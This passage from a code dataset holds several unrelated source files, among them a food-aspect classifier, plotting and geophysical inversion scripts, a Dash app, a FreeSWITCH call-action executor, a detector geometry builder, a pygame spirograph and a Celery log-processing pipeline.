words.append(noun_phrases[i][j])\n tag = self.get_tag(words)\n if tag == 'food':\n #print(phrase)\n self.food_entities.append([phrase])\n except Exception as e:\n pass\n\n def get_aspect_count(self, noun_phrases):\n aspect_count = 0\n aspect_list = []\n try:\n for i in range(len(noun_phrases)):\n phrase = noun_phrases[i]\n word = []\n try:\n for j in range(len(phrase)):\n word.append(noun_phrases[i][j])\n except Exception as e:\n pass\n tag = self.test_aspect(word)\n aspect_list.append(tag)\n except Exception as e:\n pass\n # print(aspect_list)\n return aspect_list\n\n def create_aspects(self):\n aspects,model = Kmean_cluster_tagging(100)\n pickle.dump(model,open(\"kmeans_cluster_model.p\",\"wb\"))\n pickle.dump(aspects,open(\"aspects_cluster_centers.p\",\"wb\"))\n print(\"Kmeans cluster model and aspect cluster centers model saved locally\")\n\n def create_food_clusters(self):\n food_classifier_model,model = Kmean_cluster_food_tagging(200)\n pickle.dump(model,open(\"kmeans_cluster_model_200.p\",\"wb\"))\n pickle.dump(food_classifier_model,open(\"food_classifier_model.p\",\"wb\"))\n print(\"Kmeans cluster model and aspect cluster centers model saved locally\")\n\n def get_food_list(self, noun_phrases):\n food_list_entity = []\n try:\n for i in range(len(noun_phrases)):\n phrase = noun_phrases[i]\n # print('phrase :',phrase)\n food_similarity = 0\n food_dissimilarity = 0\n food = []\n try:\n for j in range(len(phrase)):\n word = noun_phrases[i][j]\n food_similarity = food_similarity + self.get_maximum_similarity(word, self.food_entity)\n food_dissimilarity = food_dissimilarity + self.get_maximum_similarity(word, self.non_food_list)\n if food_similarity > food_dissimilarity:\n food.append(word)\n except Exception as e:\n pass\n if len(food) != 0:\n food_list_entity.append(food)\n # print('food = ', food)\n except Exception as e:\n pass\n # print(food_list)\n return food_list_entity\n\n\n\nif __name__==\"__main__\":\n analyser = context_aspect_linker()\n sentence = ' '\n while(sentence != 'end'):\n sentence = input('Enter the sentence: \\n')\n print(analyser.test_aspect(word_tokenize(sentence)))\n a = context_aspect_linker()\n print(a.get_food_list([['paneer tikia']]))\n\n\n\n\n","sub_path":"src/main/python/aspect_sentiment_analyzer/aspect_classifier.py","file_name":"aspect_classifier.py","file_ext":"py","file_size_in_byte":9427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"468528452","text":"import numpy as np\nimport sys\nsys.path.append('../../../plots/scripts')\nfrom plotClass import plotCLASS\nfrom plotParams import pltParams\n\nparams = pltParams()\n\nplc = plotCLASS()\n\n\nqBins = [85,87,88,90]\n\nruns = [\"20180627_1551\", \"20180629_1630\"] #, \"20180630_1925\", \"20180701_0746\"]\ntimeSteps = [29, 18, 19, 19]\n\nQ = np.arange(params.NradAzmBins)*params.QrangeAzm[1]/params.NradAzmBins\n\noptsDiff = {\n \"xLim\" : [-0.25, 1.1],\n \"xTitle\" : r\"time [ps]\", \n }\noptsCorr = {\n \"yLim\" : [-0.2, 0.15],\n \"xTitle\" : r\"R [$\\AA$]\", \n #\"smooth\" : 7 \n }\n\n\"\"\"\noptsDiff[\"labels\"] = []\noptsCorr[\"labels\"] = []\nfor iq in qBins:\n optsDiff[\"labels\"].append(str(iq*0.0223) + r\" $\\AA^{-1}$\")\n optsCorr[\"labels\"].append(str(iq*0.0223) + r\" $\\AA^{-1}$\")\n \"\"\"\n\nfor i,run in enumerate(runs):\n\n print(\"run\", run)\n times = np.fromfile(\"../../../mergeScans/results/timeDelays[\"\n + str(timeSteps[i] + 1) + \"].dat\", np.double)\n times = times[:-1]\n\n if run is \"20180627_1551\":\n optsDiff[\"yLim\"] = 
[-0.009, 0.008]\n elif run is \"20180629_1630\":\n optsDiff[\"yLim\"] = [-0.003, 0.007]\n\n fileName = params.mergeResultFolder\\\n + \"/data-\" + run + \"-azmAvgDiff\"\\\n + \"[\" + str(timeSteps[i]) + \",\" + str(params.NradAzmBins) + \"].dat\"\n plc.printLineOut(fileName, 1, qBins, \"../data-\" + run + \"-timeLO\", \n X=times, options=optsDiff)\n\n \"\"\"\n fileName = \"../../results/data-\"\\\n + run + \"-pairCorrOdd[\"\\\n + str(timeSteps[i]) + \",\" + str(params.NpairCorrBins) + \"].dat\"\n plc.printLineOut(fileName, 0, timeInds, \"../data-\" + run + \"-pairCorrLO\", \n xRange=params.Rrange, options=optsCorr)\n \"\"\"\n","sub_path":"UED/timeDepStudies/plots/scripts/plotTimeOuts.py","file_name":"plotTimeOuts.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"112256806","text":"# -*- coding: utf-8 -*-\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\nimport numpy as np\n\n#df=pd.read_csv()\ndf=pd.DataFrame(['2012','2013','2014','2015','2016','2017'], columns=['pctRentChange'])\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\napp.layout = html.Div(children=[\n html.H1(children='Lindsay Moore'),\n dcc.Dropdown(id='id-dropdown',options = [{'label':i}\n for i in df['pctRentChange'].values],\n multi=True,value=[]\n ),\n html.Div(children='''\n 311 Report Bias as a proxy for demographic change: A correction on NYC rental price predictions.\n '''),\n\n html.Iframe(srcDoc = open('Graffiti_2017_map.html', 'r').read(), style={'border': 'none', 'width': '50%', 'height': 700}),\n\n dcc.Graph(\n id='example-graph',\n figure={\n 'data': [\n {'x': [1, 2, 3], 'y': [4, 1, 2], 'type': 'bar', 'name': 'SF'},\n {'x': [1, 2, 3], 'y': [2, 4, 5], 'type': 'bar', 'name': u'Montréal'},\n ],\n 'layout': {\n 'title': 'Dash Data Visualization'\n }\n }\n )\n])\n\nif __name__ == '__main__':\n app.run_server(debug=True)","sub_path":"trymap.py","file_name":"trymap.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"95751024","text":"def organize(l):\n print(l)\n for p in range(len(l)-1):\n for i in range(0,len(l)-1-p):\n if l[i] > l[i+1]:\n t = l[i]\n l[i] = l[i+1]\n l[i+1] = t\n\n print(l)\n\nif __name__ == '__main__':\n l = [54,26,93,17,77,31,44,55,20]\n organize(l)\n\n","sub_path":"Project_submit/11modue/5debugorganize.py","file_name":"5debugorganize.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"74717101","text":"\ndef min_gen(a,b,c):\n def f(x):\n return a*x*x+b*x+c\n temp=0\n if b!=0:\n temp=-2*a/b\n left=0\n right=0\n if temp>=0:\n left=int(temp)\n right=int(temp)+1\n else:\n left=int(temp)-1\n right=int(temp)\n while 1:\n if f(left)\n#\n# Nishad Musthafa \n\nfrom lib.core import InitializeSwitchletEvent, Switchlet\nfrom lib.fsm import Action, FiniteStateMachine\nfrom switchlets.ivr.menu import IVRMenu\nfrom play import Play\nimport logging\nfrom utils import StartExecution, ExecutionComplete\n\nclass ActionExecutor(FiniteStateMachine, Switchlet):\n initial_state = 'not ready'\n\n transitions = [\n ('not ready', 'waiting'),\n ('waiting', 'executing'),\n ('waiting', 'complete'),\n ('executing', 'executing'),\n ('executing', 'complete'),\n ]\n action_map = {\n 'IVR' : 
IVRMenu,\n 'Play': Play,\n }\n\n def __init__(self, *args, **kwargs):\n super(ActionExecutor, self).__init__(*args, **kwargs)\n self.__dispatcher__ = None\n self.__actions__ = None\n self.__sender__ = None\n self.__action_actor__ = None\n self._call_uuid = None\n self.__logger__ = logging.getLogger('switchlets.call_handlers.action_executor.ActionExecutor')\n self.transition(to = 'waiting')\n\n def configure(self, message):\n self.__dispatcher__ = message.get_dispatcher()\n self.__actions__ = message.get_context()\n self.__sender__ = message.get_sender()\n self.__call_uuid__ = message.get_call_uuid()\n\n def get_next_action(self):\n try:\n action = self.__actions__[0]\n except IndexError:\n action = None\n\n self.__actions__ = self.__actions__[1:]\n return action\n\n def execute_actions(self, message):\n action = self.get_next_action()\n if not action:\n self.transition(to = 'complete')\n else:\n self.transition(to = 'executing', event = action)\n\n def get_call_uuid(self):\n return self.__call_uuid__\n\n @Action(state = 'complete')\n def complete_executions(self, event):\n execution_complete = ExecutionComplete()\n self.__sender__.tell({'content': execution_complete})\n\n @Action(state = 'executing')\n def executing_call(self, action):\n self.__action_actor__ = self.action_map.get(action[0]).start()\n try:\n action_params = action[1]\n except IndexError:\n action_params = None\n execution_params = {\n 'context': action_params,\n 'dispatcher': self.__dispatcher__,\n 'sender': self.actor_ref,\n 'call_uuid': self.get_call_uuid()\n }\n start_execution = StartExecution(**execution_params)\n self.__action_actor__.tell({'content': start_execution})\n\n def on_receive(self, message):\n message = message.get('content')\n if isinstance(message, StartExecution):\n self.configure(message)\n self.execute_actions(message)\n elif isinstance(message, ExecutionComplete):\n self.__action_actor__.stop()\n self.execute_actions(message)\n\n","sub_path":"switchlets/call_utilities/action_executor.py","file_name":"action_executor.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"540736845","text":"#!/usr/bin/env python\n'''\nSubbuilder of Detector\n'''\n\nimport gegede.builder\nfrom gegede import Quantity as Q\n\n\nclass ECALBarrelBuilder(gegede.builder.Builder):\n\n #^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^\n def configure(self, ecalInDim=None, **kwds):\n if ecalInDim is None:\n raise ValueError(\"No value given for ecalInDim\")\n\n self.defMat = \"Air\"\n self.ecalInDim = ecalInDim\n self.ECALBarModBldr = self.get_builder('ECALBarrelMod')\n\n\n #^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^\n def construct(self, geom):\n\n\n # Just like in the ECALEndBuilder, calculate outer dimensions \n # using other configured parameters: number of planes, thicknesses...\n # For now I'm using the CDR reported dimensions:\n self.ecalOutDim = list(self.ecalInDim)\n # For now I am hard-coding the values of the ecalOutDim[0] and ecalOutDim[1]. 
Need to calculate it more thorughly.\n self.ecalOutDim[0] = Q('3.932m') \n self.ecalOutDim[1] = Q('3.932m')\n\n\n # Define barrel as boolean, with hole to fit magnet inside\n ecalOut = geom.shapes.Box( 'ECALOut', dx=0.5*self.ecalOutDim[0], \n dy=0.5*self.ecalOutDim[1], dz=0.5*self.ecalOutDim[2]) \n ecalIn = geom.shapes.Box( 'ECALIn', dx=0.5*self.ecalInDim[0], \n dy=0.5*self.ecalInDim[1], dz=0.5*self.ecalInDim[2]) \n ecalBarBox = geom.shapes.Boolean( self.name, type='subtraction', first=ecalOut, second=ecalIn )\n ecalBar_lv = geom.structure.Volume('vol'+self.name, material=self.defMat, shape=ecalBarBox)\n self.add_volume(ecalBar_lv)\n\n\n # Get the ECAL Barrel Module volumes\n ecalMod_lv = self.ECALBarModBldr.get_volume('ECALBarrelMod')\n \n # Place the ECAL Modules, being mindful of rotation\n rtopup_in_ecalbarrel = geom.structure.Position('ECALTopUp_in_'+self.name, \n '0m', '1.858m', '-1.6m') # y: (3.5m + 21.6cm)/2 z: -(3.2m)/2 \n prtopup_in_ecalbarrel = geom.structure.Placement('placeECALTopUp_in_'+self.name,\n volume = ecalMod_lv, \n pos = rtopup_in_ecalbarrel, rot='r90aboutX')\n ecalBar_lv.placements.append( prtopup_in_ecalbarrel.name )\n \n rtopdown_in_ecalbarrel = geom.structure.Position('ECALTopDown_in_'+self.name, \n '0m', '1.858m', '1.6m')\n prtopdown_in_ecalbarrel = geom.structure.Placement('placeECALTopDown_in_'+self.name,\n volume = ecalMod_lv, \n pos = rtopdown_in_ecalbarrel, rot='r90aboutX')\n ecalBar_lv.placements.append( prtopdown_in_ecalbarrel.name )\n \n rleftup_in_ecalbarrel = geom.structure.Position('ECALLeftUp_in_'+self.name, \n '-1.858m', '0m', '-1.6m')\n prleftup_in_ecalbarrel = geom.structure.Placement('placeECALLeftUp_in_'+self.name,\n volume = ecalMod_lv, \n pos = rleftup_in_ecalbarrel, rot='r90aboutY')\n ecalBar_lv.placements.append( prleftup_in_ecalbarrel.name )\n \n rleftdown_in_ecalbarrel = geom.structure.Position('ECALLeftDown_in_'+self.name, \n '-1.858m', '0m', '1.6m')\n prleftdown_in_ecalbarrel = geom.structure.Placement('placeECALLeftDown_in_'+self.name,\n volume = ecalMod_lv, \n pos = rleftdown_in_ecalbarrel, rot='r90aboutY')\n ecalBar_lv.placements.append( prleftdown_in_ecalbarrel.name )\n \n rdownup_in_ecalbarrel = geom.structure.Position('ECALDownUp_in_'+self.name, \n '0m', '-1.858m', '-1.6m')\n prdownup_in_ecalbarrel = geom.structure.Placement('placeECALDownUp_in_'+self.name,\n volume = ecalMod_lv, \n pos = rdownup_in_ecalbarrel, rot='rminus90aboutX')\n ecalBar_lv.placements.append( prdownup_in_ecalbarrel.name )\n \n rdowndown_in_ecalbarrel = geom.structure.Position('ECALDownDown_in_'+self.name, \n '0m', '-1.858m', '1.6m')\n prdowndown_in_ecalbarrel = geom.structure.Placement('placeECALDownDown_in_'+self.name,\n volume = ecalMod_lv, \n pos = rdowndown_in_ecalbarrel, rot='rminus90aboutX')\n ecalBar_lv.placements.append( prdowndown_in_ecalbarrel.name )\n \n rrightup_in_ecalbarrel = geom.structure.Position('ECALRightUp_in_'+self.name, \n '1.858m', '0m', '-1.6m')\n prrightup_in_ecalbarrel = geom.structure.Placement('placeECALRightUp_in_'+self.name,\n volume = ecalMod_lv, \n pos = rrightup_in_ecalbarrel, rot='rminus90aboutY')\n ecalBar_lv.placements.append( prrightup_in_ecalbarrel.name )\n \n rrightdown_in_ecalbarrel = geom.structure.Position('ECALRightDown_in_'+self.name, \n '1.858m', '0m', '1.6m')\n prrightdown_in_ecalbarrel = geom.structure.Placement('placeECALRightDown_in_'+self.name,\n volume = ecalMod_lv, \n pos = rrightdown_in_ecalbarrel, rot='rminus90aboutY')\n ecalBar_lv.placements.append( prrightdown_in_ecalbarrel.name )\n 
return\n","sub_path":"python/duneggd/fgt/ECALBarrel.py","file_name":"ECALBarrel.py","file_ext":"py","file_size_in_byte":6233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"389006014","text":"#Autor Bernardo Mondragon Ramirez\n#Dibujando con ecuaciones paramétrica\n\nimport pygame\nimport math\n\n\n\nANCHO = 700\nALTO = 700\nBLANCO = (255, 255, 255)\nROJO=(250, 0, 0)\nAZUL=(0, 0, 150)\n\n\ndef dibujar(r,R,l):\n\n pygame.init()\n\n ventana = pygame.display.set_mode((ANCHO, ALTO))\n\n termina = False\n\n while not termina:\n\n for evento in pygame.event.get():\n if evento.type == pygame.QUIT:\n termina = True\n\n\n ventana.fill(BLANCO)\n\n\n for angulo in range(0,(360*(r//math.gcd(r,R))+1)):\n a = math.radians(angulo)\n k= r/R\n x = int(R*((1-k) * math.cos(a) + l*k*math.cos(a*((1-k)/k))))\n y = int(R*((1-k) * math.sin(a) - l*k*math.sin(a*((1-k)/k))))\n pygame.draw.circle(ventana, ROJO, (ANCHO//2 + x, ALTO//2 - y),1)\n\n\n\n\n\n for angulo in range(0,(360*((r+20)//math.gcd((r+20),(R-85)))+1)):\n a = math.radians(angulo)\n k = (r+20) / (R-85)\n X= int((R-85)*((1-k)*math.cos(a)+l*k*math.cos(a*((1-k)/k))))\n Y= int((R-85)*((1-k)*math.sin(a)-l*k*math.sin(a*((1-k)/k))))\n pygame.draw.circle(ventana,AZUL,(ANCHO//2+X , ALTO//2-Y),1)\n\n\n\n\n\n pygame.display.flip()\n\n\n\n pygame.quit()\n\n\n\n\ndef main():\n r = int(input(\"Teclea el valor de r:\"))\n R = int(input(\"Tecles el valor de R:\"))\n l = float(input(\"Teclea el valor de l:\"))\n\n dibujar(r,R,l)\n\n\n\n\nmain()","sub_path":"Mision06.py","file_name":"Mision06.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"593608456","text":"import unittest\nimport os\nimport logging\nimport logging.config\n\nfrom backupme.settings_parser import SettingsParser\nfrom backupme.configuration_parser import validator\nfrom backupme.configuration_parser import get_list_files\n\n# get environment variables\nparser = SettingsParser()\nPROJECT_DIR = parser.get('project_dir')\nMAIN_LOG_PATH = parser.get('main_log')\n\n\nclass TestValidator(unittest.TestCase):\n\n def test_file_list_with_missing_files(self):\n \"\"\"\n file_list_with_missing_files should result equal for result\n file_list after validation and list with only existent\n files.\n \"\"\"\n file_list = []\n nonexistent_file = os.path.join(PROJECT_DIR, 'nonexistent_file')\n existent_file = os.path.join(PROJECT_DIR, 'README.md')\n file_list.append(nonexistent_file)\n file_list.append(existent_file)\n self.assertEqual(validator(file_list), [existent_file])\n \n def test_file_list_with_all_existent_files(self):\n \"\"\"\n file_list_with_all_existent_files should result equal for\n result file_list validation and original file_list.\n \"\"\"\n existent_file_1 = os.path.join(PROJECT_DIR, 'README.md')\n existent_file_2 = os.path.join(PROJECT_DIR, '.gitignore')\n existent_file_3 = os.path.join(PROJECT_DIR, 'LICENSE')\n file_list = [existent_file_1, existent_file_2, existent_file_3]\n # copy original list to compare with its copy after\n # original list validation\n file_list_copy = list(file_list)\n self.assertEqual(validator(file_list), file_list_copy)\n\n\nclass TestGetListFiles(unittest.TestCase):\n current_dir = os.path.dirname(os.path.realpath(__file__))\n config_file_path = os.path.join(current_dir, 'config')\n\n def setUp(self):\n \"\"\"\n Function to create configuration file before every test case.\n \"\"\"\n open(self.config_file_path, 
'w+').close()\n\n def tearDown(self):\n \"\"\"\n Function to delete configuration file after every test case.\n \"\"\"\n os.remove(self.config_file_path)\n\n def _add_line_to_config_file(self, line):\n \"\"\"\n Helper function to add line to config file.\n\n :param line: line to add.\n \"\"\"\n with open(self.config_file_path, 'a') as f:\n f.write(line + '\\n')\n\n def test_correct_config_file(self):\n \"\"\"\n correct_config_file should result equal for result\n get_list_files and expected_file_list with all existent\n file paths.\n \"\"\"\n existent_file_1 = os.path.join(PROJECT_DIR, 'README.md')\n existent_file_2 = os.path.join(PROJECT_DIR, '.gitignore')\n existent_file_3 = os.path.join(PROJECT_DIR, 'LICENSE')\n self._add_line_to_config_file(existent_file_1)\n self._add_line_to_config_file(existent_file_2)\n self._add_line_to_config_file(existent_file_3)\n expected_file_list = [\n existent_file_1, existent_file_2, existent_file_3]\n self.assertEqual(get_list_files(self.config_file_path),\n expected_file_list)\n\n def test_non_existent_config_file(self):\n \"\"\"\n non_existent_config_file should raise IOError with\n nonexistent_config_file_path argument.\n \"\"\"\n nonexistent_file_path = os.path.join(self.current_dir, 'nonexistent')\n self.assertRaises(IOError, get_list_files, nonexistent_file_path)\n\n def test_empty_config_file(self):\n \"\"\"\n empty_config_file should raise TypeError with\n path for empty file argument.\n \"\"\"\n self.assertRaises(TypeError, get_list_files)\n\n\nlogging.config.fileConfig(\n os.path.join(PROJECT_DIR, 'google_api_driver/logging.conf'),\n defaults={'logfilename': MAIN_LOG_PATH})\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/configuration_parser_tests.py","file_name":"configuration_parser_tests.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"139995017","text":"from __future__ import print_function\nimport unittest\nfrom SimPEG import (Directives, Maps,\n InvProblem, Optimization, DataMisfit,\n Inversion, Utils, Regularization, Mesh)\nfrom discretize.utils import meshutils\nimport SimPEG.PF as PF\nimport numpy as np\nfrom scipy.interpolate import NearestNDInterpolator\nfrom SimPEG.Utils import mkvc\n\nclass MagInvLinProblemTest(unittest.TestCase):\n\n def setUp(self):\n\n np.random.seed(0)\n\n # First we need to define the direction of the inducing field\n # As a simple case, we pick a vertical inducing field of magnitude\n # 50,000nT.\n # From old convention, field orientation is given as an\n # azimuth from North (positive clockwise)\n # and dip from the horizontal (positive downward).\n H0 = (50000., 90., 0.)\n\n # Create a mesh\n h = [5, 5, 5]\n padDist = np.ones((3, 2)) * 100\n nCpad = [2, 4, 2]\n\n # Create grid of points for topography\n # Lets create a simple Gaussian topo and set the active cells\n [xx, yy] = np.meshgrid(\n np.linspace(-200., 200., 50),\n np.linspace(-200., 200., 50)\n )\n\n b = 100\n A = 50\n zz = A*np.exp(-0.5*((xx/b)**2. + (yy/b)**2.))\n\n # We would usually load a topofile\n topo = np.c_[Utils.mkvc(xx), Utils.mkvc(yy), Utils.mkvc(zz)]\n\n # Create and array of observation points\n xr = np.linspace(-100., 100., 20)\n yr = np.linspace(-100., 100., 20)\n X, Y = np.meshgrid(xr, yr)\n Z = A*np.exp(-0.5*((X/b)**2. 
+ (Y/b)**2.)) + 5\n\n # Create a MAGsurvey\n xyzLoc = np.c_[Utils.mkvc(X.T), Utils.mkvc(Y.T), Utils.mkvc(Z.T)]\n rxLoc = PF.BaseMag.RxObs(xyzLoc)\n srcField = PF.BaseMag.SrcField([rxLoc], param=H0)\n survey = PF.BaseMag.LinearSurvey(srcField)\n\n # self.mesh.finalize()\n self.mesh = meshutils.mesh_builder_xyz(\n xyzLoc, h, padding_distance=padDist,\n mesh_type='TREE',\n )\n\n self.mesh = meshutils.refine_tree_xyz(\n self.mesh, topo, method='surface',\n octree_levels=nCpad,\n octree_levels_padding=nCpad,\n finalize=True,\n )\n\n # Define an active cells from topo\n actv = Utils.surface2ind_topo(self.mesh, topo)\n nC = int(actv.sum())\n\n # We can now create a susceptibility model and generate data\n # Lets start with a simple block in half-space\n self.model = Utils.ModelBuilder.addBlock(\n self.mesh.gridCC, np.zeros(self.mesh.nC),\n np.r_[-20, -20, -15], np.r_[20, 20, 20], 0.05\n )[actv]\n\n # Create active map to go from reduce set to full\n self.actvMap = Maps.InjectActiveCells(self.mesh, actv, np.nan)\n\n # Creat reduced identity map\n idenMap = Maps.IdentityMap(nP=nC)\n\n # Create the forward model operator\n prob = PF.Magnetics.MagneticIntegral(\n self.mesh, chiMap=idenMap, actInd=actv\n )\n\n # Pair the survey and problem\n survey.pair(prob)\n\n # Compute linear forward operator and compute some data\n data = prob.fields(self.model)\n\n # Add noise and uncertainties (1nT)\n noise = np.random.randn(len(data))\n data += noise\n wd = np.ones(len(data))*1.\n\n survey.dobs = data\n survey.std = wd\n\n # Create sensitivity weights from our linear forward operator\n rxLoc = survey.srcField.rxList[0].locs\n wr = prob.getJtJdiag(self.model)**0.5\n wr /= np.max(wr)\n\n # Create a regularization\n reg = Regularization.Sparse(self.mesh, indActive=actv, mapping=idenMap)\n reg.norms = np.c_[0, 0, 0, 0]\n reg.cell_weights = wr\n\n reg.mref = np.zeros(nC)\n\n # Data misfit function\n dmis = DataMisfit.l2_DataMisfit(survey)\n dmis.W = 1./survey.std\n\n # Add directives to the inversion\n opt = Optimization.ProjectedGNCG(\n maxIter=20, lower=0., upper=10.,\n maxIterLS=20, maxIterCG=20, tolCG=1e-4,\n stepOffBoundsFact=1e-4\n )\n\n invProb = InvProblem.BaseInvProblem(dmis, reg, opt, beta=1e+6)\n\n # Here is where the norms are applied\n # Use pick a treshold parameter empirically based on the distribution of\n # model parameters\n IRLS = Directives.Update_IRLS(\n f_min_change=1e-3, maxIRLSiter=20, beta_tol=1e-1,\n betaSearch=False\n )\n update_Jacobi = Directives.UpdatePreconditioner()\n\n # saveOuput = Directives.SaveOutputEveryIteration()\n # saveModel.fileName = work_dir + out_dir + 'ModelSus'\n self.inv = Inversion.BaseInversion(\n invProb,\n directiveList=[IRLS, update_Jacobi]\n )\n\n def test_mag_inverse(self):\n\n # Run the inversion\n mrec = self.inv.run(np.ones_like(self.model)*1e-4)\n\n residual = np.linalg.norm(mrec-self.model) / np.linalg.norm(self.model)\n # print(residual)\n # import matplotlib.pyplot as plt\n # plt.figure()\n # ax = plt.subplot(1, 2, 1)\n # midx = 65\n # self.mesh.plotSlice(self.actvMap*mrec, ax=ax, normal='Y', ind=midx,\n # grid=True, clim=(0, 0.02))\n # ax.set_xlim(self.mesh.gridCC[:, 0].min(), self.mesh.gridCC[:, 0].max())\n # ax.set_ylim(self.mesh.gridCC[:, 2].min(), self.mesh.gridCC[:, 2].max())\n\n # ax = plt.subplot(1, 2, 2)\n # self.mesh.plotSlice(self.actvMap*self.model, ax=ax, normal='Y', ind=midx,\n # grid=True, clim=(0, 0.02))\n # ax.set_xlim(self.mesh.gridCC[:, 0].min(), self.mesh.gridCC[:, 0].max())\n # ax.set_ylim(self.mesh.gridCC[:, 2].min(), 
self.mesh.gridCC[:, 2].max())\n # plt.show()\n\n self.assertTrue(residual < 0.5)\n # self.assertTrue(residual < 0.05)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/pf/test_mag_inversion_linear_Octree.py","file_name":"test_mag_inversion_linear_Octree.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"436097264","text":"import imageio\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\n\n#This part of code is needed to connect to your Google Drive (to load the images from it and save the results)\n#The standard RGB image is loaded to the system.\n\nimg = imageio.imread('128472-nebo-zakat-minimalizm-priroda-oblako-3840x2160.jpg')\nimgplot = plt.imshow(img)\nplt.grid(False)\nplt.title('Original')\n#Then the image is converted to the grayscale mode. Our histogram-based method extracts regions using only the intensity information.\n\ndef rgb2gray(rgb):\n return np.dot(rgb[...,:3], [0.299, 0.587, 0.114]) # luminance channel\n\ngray = rgb2gray(img)\ngray = gray.astype(np.int64)\n\nplt.imshow(gray, cmap = plt.get_cmap('gray'))\nplt.grid(False)\nplt.title('Intensity image')\nplt.show()\n#The corresponging histogram is then calculated.\nplt.hist(gray.flatten(), bins=256, facecolor='black', alpha=1)\nplt.grid('off') \nplt.axis('off')\nplt.show()\n#Image sub-part selection\n#The method to extract a sub-part of the image is based on the image intensity histogram.\n#We select image regions using the following scheme: The user defins the approximate desired percent of the image to be extracted (i.e, a percent of all the image pixels).\n#Then a sub-part with width of 9 bins is randomly selected and exctracted from the histogram.\n#The process in repeated untill the number of pixels from the original grayscale image selected is equal (or bigger) than the percent specified by the user.\n#The proposed algorithms works for natural images, where the histogram has values in all the spectra, which are evenly distributed.\ndef getmask(imhist,percent=99):\n ''' function takes the histogram and % of the pixels for the mask, and takes the approx% of the values from the right part of hist.\n The returned value is the pixel intensity value which will be used as a threshold later'''\n taken_pix = 0\n total_pix = np.sum(imhist, axis = 0)\n indexes_to_return = []\n while taken_pix<=percent:\n rand_hist_val = random.randint(4, 128) # take a random initialization \n random_hist_part = np.sum(imhist[rand_hist_val-1:rand_hist_val+1],axis=0)\n imhist[rand_hist_val-1:rand_hist_val+1] = 0 # we put zeros to the values already taken\n indexes_to_return.append(range(rand_hist_val-1,rand_hist_val+1))\n taken_pix += (random_hist_part/total_pix)*100\n \n \n return indexes_to_return # attention! 
works with natural images only with colors in different parts of hist.\nH = plt.hist(gray.flatten(), bins=256, facecolor='black', alpha=1)\nint_values = getmask(H[0], 4) # just modify the percent of the pixel values taken\nprint(\"returned values for this image\") \nprint(int_values)\narray_lum_val = []\nn, bins, patches = plt.hist(gray.flatten(), bins=256, align='left', color='black')\nfor values in int_values:\n for i in values:\n patches[i].set_fc('r')\n array_lum_val.append(i)\nplt.grid('off') \nplt.axis('off')\nplt.title('Resulting histogram (black) with selected regions (red)')\nplt.show()\narray_lum_val.sort()\n\nprint(array_lum_val) # luminance values selected\n\nfor i in array_lum_val:\n img[img==i] = i+1\n\nplt.hist(gray.flatten(), bins=256, facecolor='black', alpha=1)\nplt.grid('off') \nplt.axis('off')\nplt.show()\nimageio.imwrite(\"mod.png\", img)","sub_path":"src/Hist_test.py","file_name":"Hist_test.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"503267485","text":"from UX.extensions import celery\nfrom UX.utils.data_cleaning.data_cleaning import data_cleaning, \\\n preprocessing_for_markov, sampling\nfrom UX.utils.markov_click.markov import fitting_model\nfrom UX.utils.log_parsing.parser import LogParser\nfrom UX.config import DATA_DIR\nfrom UX.utils.session_identification.session_identification import \\\n execute_session_identification\nimport os\nimport traceback\nimport sys\n\n\n@celery.task\ndef processing(filenames):\n parsed_file_dir = str(os.path.join(DATA_DIR, 'interm'))\n cleaned_file_dir = str(os.path.join(DATA_DIR, 'interm', 'clean'))\n identified_file_dir = str(os.path.join(DATA_DIR, 'interm', 'identified/'))\n model_file_dir = str(os.path.join(DATA_DIR, 'final/'))\n\n print(\"*----------------------------------*\")\n print(\"starting parsing\")\n print(\"*----------------------------------*\")\n parsed_files = parsing(filenames, parsed_file_dir)\n\n print(\"*----------------------------------*\")\n print(\"moving on to cleaning\")\n print(\"*----------------------------------*\")\n cleaned_files = cleaning(parsed_files, cleaned_file_dir)\n\n print(\"*----------------------------------*\")\n print(\"moving on to session identication\")\n print(\"*----------------------------------*\")\n session_files = session_identification(cleaned_files, output_dir=identified_file_dir)\n\n print(\"*----------------------------------*\")\n print(\"moving on to training\")\n print(\"*----------------------------------*\")\n return training(session_files, model_file_dir)\n\n\ndef parsing(filenames, output_dir): # spark\n parser = LogParser(4)\n log = parser.load_log_file(filenames)\n return parser.data_wrangling(log, output_dir)\n\n\ndef cleaning(parsed_files, output_dir):\n parsed_file_path = parsed_files[\"parsed_log\"]\n try:\n df = data_cleaning(parsed_file_path)\n preprocessing_for_markov(df)\n interm_cleaned_files = {}\n interm_cleaned_files[\"data_clean\"] = 